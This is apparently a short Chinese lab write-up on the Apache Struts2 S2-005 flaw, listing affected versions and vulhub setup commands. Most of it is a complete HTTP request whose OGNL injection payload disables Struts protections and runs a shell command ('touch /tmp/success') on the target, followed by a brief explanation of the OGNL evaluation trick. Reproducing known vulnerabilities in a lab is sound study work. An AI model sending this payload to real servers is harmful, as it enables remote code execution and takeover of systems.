影響版本
2.0.0 ~ 2.1.8.1
環境搭建
cd vulhub/struts2/s2-005
docker-compose build && docker-compose up -d
漏洞復現
發生數據包包
GET /example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%[email protected]@getRuntime()))=1 HTTP/1.1
Host: target:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Success成功建立
POC用到了OGNL的Expression Evaluation:
大概可以理解爲,(aaa)(bbb)中aaa作爲OGNL表達式字符串,bbb作爲該表達式的root對象,所以一般aaa位置如果需要執行代碼,需要用引號包裹起來,而bbb位置可以直接放置Java語句。(aaa)(bbb)=true實際上就是aaa=true。